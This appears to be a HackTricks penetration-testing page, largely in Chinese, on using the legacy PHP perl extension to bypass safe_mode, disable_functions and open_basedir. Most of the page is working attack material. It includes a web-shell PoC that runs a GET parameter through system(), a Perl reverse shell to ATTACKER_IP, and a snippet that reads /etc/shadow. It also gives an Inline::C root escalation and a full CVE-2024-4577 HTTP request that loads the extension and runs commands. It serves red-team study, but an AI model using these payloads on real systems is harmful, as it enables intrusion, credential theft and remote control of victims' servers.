PHP Perl Extension Safe_mode Bypass Exploit

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks

背景

被跟踪为 CVE-2007-4596 的问题来自遗留的 perl PHP 扩展,该扩展嵌入了完整的 Perl 解释器,但不会遵守 PHP 的 safe_modedisable_functionsopen_basedir 控制。任何加载了 extension=perl.so 的 PHP worker 都能获得不受限制的 Perl eval,因此即使所有常见的 PHP 进程生成原语被阻止,命令执行仍然非常容易。尽管 safe_mode 在 PHP 5.4 中被移除,但许多过时的共享主机堆栈和易受攻击的实验环境仍然包含它,因此当你遇到遗留控制面板时,这个绕过仍然有用。

兼容性与打包状态(2025)

  • 最后的 PECL 发布(perl-1.0.1, 2013)面向 PHP ≥5.0;由于 Zend API 已更改,PHP 8+ 通常会失败。
  • PECL 正被 PIE 取代,但旧的堆栈仍然提供 PECL/pear。在 PHP 5/7 目标上使用下面的流程;在更新的 PHP 上,预计需要降级或切换到另一个注入路径(例如 userland FFI)。

在 2025 年构建可测试环境

  • 从 PECL 获取 perl-1.0.1,为你计划攻击的 PHP 分支编译它,并全局加载(php.ini)或通过 dl() 加载(如果允许)。
  • 快速 Debian 基础实验室配方:
sudo apt install php5.6 php5.6-dev php-pear build-essential
sudo pecl install perl-1.0.1
echo "extension=perl.so" | sudo tee /etc/php/5.6/mods-available/perl.ini
sudo phpenmod perl && sudo systemctl restart apache2
  • 在利用过程中通过 var_dump(extension_loaded('perl'));print_r(get_loaded_extensions()); 确认可用性。如果不存在,搜索 perl.so 或滥用可写的 php.ini/.user.ini 条目以强制加载它。
  • 因为解释器驻留在 PHP worker 内部,不需要外部二进制 —— 网络出口过滤器或 proc_open 黑名单不起作用。

当可以访问 phpize 时的本机构建链

如果受害主机上存在 phpize 和 build-essential,你可以在不调用操作系统 shell 的情况下编译并放置 perl.so

# grab the tarball from PECL
wget https://pecl.php.net/get/perl-1.0.1.tgz
tar xvf perl-1.0.1.tgz && cd perl-1.0.1
phpize
./configure --with-perl=/usr/bin/perl --with-php-config=$(php -r 'echo PHP_BINARY;')-config
make -j$(nproc)
cp modules/perl.so /tmp/perl.so
# then load with a .user.ini in the webroot if main php.ini is read-only
echo "extension=/tmp/perl.so" > /var/www/html/.user.ini

如果启用了 open_basedir,请确保放置的 .user.ini.so 位于允许的路径下;extension= 指令在 basedir 内仍然被遵守。编译流程与 PHP manual 中构建 PECL extensions 的说明一致。

Original PoC (NetJackal)

From http://blog.safebuff.com/2016/05/06/disable-functions-bypass/, still handy to confirm the extension responds to eval:

<?php
if(!extension_loaded('perl'))die('perl extension is not loaded');
if(!isset($_GET))$_GET=&$HTTP_GET_VARS;
if(empty($_GET['cmd']))$_GET['cmd']=(strtoupper(substr(PHP_OS,0,3))=='WIN')?'dir':'ls';
$perl=new perl();
echo "<textarea rows='25' cols='75'>";
$perl->eval("system('".$_GET['cmd']."')");
echo "&lt;/textarea&gt;";
$_GET['cmd']=htmlspecialchars($_GET['cmd']);
echo "<br><form>CMD: <input type=text name=cmd value='".$_GET['cmd']."' size=25></form>";
?>

现代 Payload 增强

1. 通过 TCP 获得完整 TTY

嵌入的解释器可以加载 IO::Socket,即使 /usr/bin/perl 被阻止:

$perl = new perl();
$payload = <<<'PL'
use IO::Socket::INET;
my $c = IO::Socket::INET->new(PeerHost=>'ATTACKER_IP',PeerPort=>4444,Proto=>'tcp');
open STDIN,  '<&', $c;
open STDOUT, '>&', $c;
open STDERR, '>&', $c;
exec('/bin/sh -i');
PL;
$perl->eval($payload);

2. 即使启用了 open_basedir 的文件系统逃逸

Perl 会忽略 PHP 的 open_basedir 设置,因此你可以读取任意文件:

$perl = new perl();
$perl->eval('open(F,"/etc/shadow") || die $!; print while <F>; close F;');

将输出通过 IO::Socket::INETNet::HTTP 管道化以 exfiltrate 数据,而不触碰 PHP 管理的描述符。

3. Inline Compilation for Privilege Escalation

如果系统范围内存在 Inline::C,可以在请求中编译辅助程序,而无需依赖 PHP 的 ffipcntl

$perl = new perl();
$perl->eval(<<<'PL'
use Inline C => 'DATA';
print escalate();
__DATA__
__C__
char* escalate(){ setuid(0); system("/bin/bash -c 'id; cat /root/flag'"); return ""; }
PL
);

4. Living-off-the-Land Enumeration

将 Perl 当作一个 LOLBAS 工具包来使用——例如,即使缺少 mysqli 也可以转储 MySQL DSNs:

$perl = new perl();
$perl->eval('use DBI; @dbs = DBI->data_sources("mysql"); print join("\n", @dbs);');

2024+ 滥用:通过 PHP-CGI 参数注入加载 perl.so (CVE-2024-4577)

在仍然暴露 PHP-CGI 的 Windows 安装上,2024 年的参数注入回归 (CVE-2024-4577) 允许你向解释器传递任意的 -d 选项。 这意味着即使 dl() 被禁用且 php.ini 为只读,你也可以加载 Perl 扩展:

  • 构建或上传一个兼容的 perl.dll/perl.so 到可写的 web 路径(例如,C:\xampp\htdocs\temp\perl.dll)。
  • 发送单个 HTTP 请求,注入 -d extension=C:\\xampp\\htdocs\\temp\\perl.dll,并在同一请求体中包含一个基于 Perl 的 payload:
POST /?%ADd+extension=C:\\xampp\\htdocs\\temp\\perl.dll+%ADd+auto_prepend_file%3dphp://input HTTP/1.1
Host: victim
Content-Type: application/x-www-form-urlencoded
Content-Length: 120

<?php $p=new perl(); $p->eval("system('whoami && hostname')"); ?>

由于 PHP worker 在读取 body 之前就嵌入了 Perl,所有经典的 disable_functions/open_basedir 控制都会被绕过。该方法在未修补的 Windows/CGI 堆栈上有效(PHP 8.1.29/8.2.20/8.3.8 及更高版本已修复此回归)。如果 open_basedir 阻止访问 DLL 路径,可以先把文件放到允许的基目录内,或利用 XAMPP 附带的已有可被所有用户读取的 DLL 路径。

参考资料

Tip

学习和实践 AWS 黑客技术:HackTricks Training AWS Red Team Expert (ARTE)
学习和实践 GCP 黑客技术:HackTricks Training GCP Red Team Expert (GRTE) 学习和实践 Azure 黑客技术:HackTricks Training Azure Red Team Expert (AzRTE)

支持 HackTricks